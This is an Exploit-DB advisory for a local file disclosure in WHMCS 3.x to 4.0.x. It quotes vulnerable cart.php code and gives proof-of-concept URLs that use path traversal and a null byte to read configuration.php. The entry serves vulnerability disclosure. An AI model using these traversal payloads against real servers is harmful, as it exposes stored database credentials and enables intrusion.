WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure

EDB-ID:

17999

CVE:

EDB Verified:

Author:

Lagripe-Dz & Mca-Crb

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2011-10-19

Vulnerable App:

# Title      : WHMCompleteSolution (cart.php) Local File Disclosure
# Author     : Lagripe-Dz
# Product    : WHMCS ( WHMCompleteSolution )
# Vendor     : http://whmcs.com/
# Date       : 10/01/2011
# Version    : 3.x.x , 4.0.x
# Tested on  : linux+apache

================================================================

Vuln file: cart.php
---------

Vuln code:
---------

if ( $a == "add" )
{
   $templatefile = "configureproductdomain";
    ....etc
}

if ( $a == "login" )
{
    $templatefile = "login";
    ....etc
}
 ...
outputClientArea( $templatefile, $nowrapper );
# outputClientArea function will display
"./templates/orderforms/cart/{$templatefile}.tpl"


Details :
---------

if variable "$a" has a true value .. will set "$templatefile" value by
default
but when "$a" value didn't match the defaults values
you can control "$templatefile" and use it as ( File Disclosure )


Proof of Concept :
------------------

http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00

http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00


note* : show the page source to see Disclosure file.

Solution :
----------

the vendor Notificate
update to the last version

================================================================

Greetz To All www.Sec4ever.com Members.

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services